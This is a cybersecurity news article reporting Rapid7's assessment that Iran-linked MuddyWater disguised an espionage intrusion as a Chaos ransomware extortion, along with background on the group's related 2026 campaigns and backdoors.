Iranian cyber espionage disguised as a Chaos Ransomware attack

Pierluigi Paganini
May 06, 2026

Iran-linked APT MuddyWater used ransomware-style tactics to mask espionage, combining phishing, credential theft, data exfiltration, and extortion without encryption.

A newly discovered cyber intrusion attributed to the Iran-linked APT MuddyWater (aka SeedWorm, TEMP.Zagros, Mango Sandstorm, TA450, and Static Kitten) reveals how state-sponsored attackers are increasingly leveraging ransomware tactics to disguise espionage operations. The campaign, uncovered by security researchers at Rapid7, blended social engineering, credential theft, data exfiltration, and extortion under the guise of a ransomware incident — but with no evidence of actual file encryption.

The attack unfolded in early 2026 and initially appeared to be a routine ransomware case. Victims were led to believe they were dealing with the Chaos ransomware group, which operates a leak site for stolen data. However, further investigation showed no ransomware had been deployed. Instead, the attackers relied on espionage tradecraft — lateral movement, credential harvesting, and information theft — consistent with MuddyWater’s long-standing intelligence-gathering profile.

“In early 2026, a sophisticated intrusion initially appearing to be a standard Chaos ransomware attack was assessed to be consistent with a targeted state-sponsored operation. While the threat actor operated under the banner of the Chaos ransomware-as-a-service (RaaS) group, forensic analysis revealed the incident was a “false flag” masquerade.” reads the report published by Rapid7. “Technical artifacts, including a specific code-signing certificate and Command-and-Control (C2) infrastructure, suggest with moderate confidence that this activity is linked to MuddyWater (Seedworm), an Iranian Advanced Persistent Threat (APT) affiliated with the Ministry of Intelligence and Security (MOIS).”

Rapid7’s analysis shows that the threat actors gained initial access through social engineering tactics, exploiting trust in corporate communications tools. Attackers used Microsoft Teams to contact employees directly, posing as internal IT staff or business associates. Through these conversations, they persuaded users to begin screen-sharing sessions, giving the attackers direct visibility into corporate desktops and systems.

Once connected, the hackers executed reconnaissance commands, accessed files related to VPN configurations, and tricked employees into writing their credentials into locally saved text files. In at least one case, they installed the AnyDesk remote access tool to maintain a foothold in the organization’s network.

After establishing initial access, the threat actors utilized RDP sessions and DWAgent, another remote management tool, to maintain persistence. From there, they launched secondary payloads, harvested more credentials, and exfiltrated sensitive internal information.

“From there, the TA established persistence using remote access tools such as DWAgent and AnyDesk, before deploying additional payloads and further control of the environment.” reads the report. “Following this, the TA exfiltrated data from the compromised environment and subsequently contacted the victim via email, claiming data theft and initiating ransom negotiations.”

As part of the deception, MuddyWater operatives sent extortion emails to employees, claiming to have stolen confidential data and threatening to leak it unless a ransom was paid. They directed victims to the Chaos ransomware site, where the organization was indeed listed as a “new victim.”

However, when the supposed ransom “note” could not be located, the threat actors released the stolen data publicly, revealing that the true objective was data theft, not financial gain.

Rapid7 concluded that the entire ransomware scenario was a smokescreen designed to mislead defenders. “The inclusion of extortion and negotiation elements likely aimed to focus response teams on the immediate impact, delaying detection of persistence mechanisms implanted through remote access tools,” the researchers wrote.

The recent campaign spotted by Rapid7 highlights a broader trend in which nation‑state actors blend espionage with criminal aesthetics to mislead victims and deflect investigators. By adopting the look and feel of a ransomware attack, complete with fake negotiation email threads and presence on an established leak site, MuddyWater obscured its true intent: long-term infiltration and intelligence collection.

Rapid7 assessed the attribution to MuddyWater with “moderate confidence,” citing both technical overlap and contextual consistency. The researchers noted that the incident does not represent a strategic shift toward ransomware operations, but rather an evolution in deception and misdirection techniques designed to complicate attribution and response.

By masquerading as a financially motivated actor, the Iranian APT hoped to divert attention and prolong access to compromised networks. The tactic underscores how modern cyber espionage is no longer confined to covert surveillance, it now borrows the tools, language, and theatrics of cybercrime to hide in plain sight.

The episode serves as a warning to defenders: not every ransomware attack is what it seems. When state-backed adversaries like MuddyWater adopt the same playbook as criminal gangs, distinguishing espionage from extortion becomes one of cybersecurity’s most urgent challenges.

“The use of a RaaS framework in this context may enable the actor to blur distinctions between state-sponsored activity and financially motivated cybercrime, thereby complicating attribution.” concludes the report. “Furthermore, the inclusion of extortion and negotiation elements could serve to focus defensive efforts on immediate impact, likely delaying the identification of underlying persistence mechanisms established via remote access tools such as DWAgent or AnyDesk.”

The first MuddyWater campaign was observed in late 2017, when the APT group targeted entities in the Middle East.

Experts named the campaign ‘MuddyWater’ due to the difficulty in attributing a wave of attacks between February and October 2017, targeting entities in Saudi Arabia, Iraq, Israel, the United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States. Over the years, the group has evolved by adding new attack techniques to its arsenal and has also targeted European and North American countries.

The group’s victims are mainly in the telecommunications, government (IT services), and oil sectors.

In January 2022, US Cyber Command (USCYBERCOM) officially linked the MuddyWater APT group to Iran’s Ministry of Intelligence and Security (MOIS).

The MuddyWater APT has targeted several organizations in the U.S. and Canada since early February 2026. Victims include a U.S. bank, an airport, nonprofits, and a software supplier to the defense and aerospace sectors with operations in Israel. The previously unknown backdoor Dindoor relies on the Deno runtime to execute JavaScript and TypeScript code and was signed with a certificate issued to “Amy Cherne.”

The researchers also observed an attempt to exfiltrate data from a targeted software company using Rclone to a Wasabi Technologies cloud storage bucket, though it’s unclear if the transfer succeeded. The experts also spotted a separate Python backdoor, dubbed Fakeset, on U.S. airport and nonprofit networks, signed with certificates tied to Seedworm. The malware was hosted on Backblaze servers, and shared certificates with other Seedworm-linked malware families, suggesting the Iranian group was behind the intrusions.

Recent activity linked to Iranian cyber actors shows a mix of espionage, disruption, and influence operations. The pro-Palestinian hacktivist group Handala has targeted Israeli officials and energy firms through phishing, data theft, ransomware, and leak campaigns, claiming breaches of organizations in Israel and the Gulf. Meanwhile, the Iranian APT Seedworm conducted spear-phishing attacks against academics, NGOs, and government entities to gather intelligence. Another group, Marshtreader, scanned vulnerable cameras in Israel for reconnaissance during regional tensions.

In March, the Iran-linked APT targeted U.S. organizations, deploying the new Dindoor backdoor across sectors including banks, airports, and nonprofits, Broadcom’s Symantec Threat Hunter Team revealed.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon